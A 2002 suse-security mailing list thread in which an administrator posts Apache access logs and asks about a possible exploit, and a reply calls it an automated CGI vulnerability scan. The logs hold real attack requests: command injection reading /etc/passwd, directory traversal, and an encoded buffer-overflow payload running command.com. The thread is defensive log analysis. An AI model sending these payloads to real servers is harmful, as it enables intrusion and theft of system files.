This is a webscan, or a CGI scan, or, as far as we can tell, a script kiddie's attempt.

Sorry for my poor English.

Best Regards,

"Let whoever has never pirated throw the first disc; I'll throw a copy"

===================
Sp0oKeR - NsC
Linux / Security Analyst
spooker@bol.com.br
====================

----- Original Message -----
From: Charles Funderburk <charles.t.funderburk@mail.sprint.com>
To: <suse-security@suse.com>
Sent: Wednesday, July 10, 2002 3:04 PM
Subject: [suse-security] Possible Apache Exploit?

Hello all,

I am new to the list and have gained a ton from reading all the comments and suggestions. I thought someone might be able to help me out and give me their two cents on something I noticed in my Apache access logs. Looks like a buffer overflow intended for an NT machine.

10.70.24.222 - - [10/Jul/2002:01:05:44 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET /IAmAScaryCyberCop.SNI" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET http://10.144.192.54/cfdocs/expeval/openfile.cfm HTTP/1.0" 404 302
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET /cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C62j%01V%8A%06<_u%03%80.?FAI%84%C0u%F0%BAto|_%B9t`}`%03%CA%FF%D1%BAX_|_%B9XP|`%03%CA%FF%D1c:\command.com_/c_copy_\WebSite\readme.1st_\WebSite\htdocs\cybercop.htm" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET http://10.144.192.54/cfdocs/expeval/displayopenedfile.cfm HTTP/1.0" 404 311
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET /cybercop.htm" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET http://10.144.192.54/cfdocs/expeval/exprcalc.cfm HTTP/1.0" 404 302
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET file://etc/passwd" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET /cgi-bin/faxsurvey?cat%20/etc/passwd" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/faxsurvey?cat%20/etc/passwd HTTP/1.0" 404 292
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /carbo.dll?icatcommand=..\..\winnt\win.ini&catalogname=catalog" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/info2www?(../../../../../../../../sbin/ping-c%d%s|)" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/pfdispaly?../../../../../etc/passwd" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "get /" 501 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/MachineInfo" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /IAmAScaryCyberCop.SNI" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /scripts/tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=NAI+Test&dbq=..%2fwwwroot%2fNAI-18719.htm&newdb=CREATE_DB&attr= HTTP/1.0" 404 299
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /ASPSamp/ HTTP/1.0" 404 283
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/Count.cgi?dd=aa HTTP/1.0" 404 292
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /mylog.phtml?screen=/etc/passwd" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET / HTTP/1.0" 200 1350
10.70.24.222 - - [10/Jul/2002:01:06:11 -0500] "GET /mlog.phtml?screen=/etc/passwd" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:11 -0500] "GET /php/mylog.phtml?screen=/etc/passwd" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:11 -0500] "POST /cgi-win/uploader.exe/cgi-win/ HTTP/1.0" 404 304

I haven't seen any of the code for the latest Apache chunk exploit. Anyone have any ideas or suggestions?

Thanks!

-Charles

--
To unsubscribe, e-mail: suse-security-unsubscribe@suse.com
For additional commands, e-mail: suse-security-help@suse.com
Security-related bug reports go to security@suse.de, not here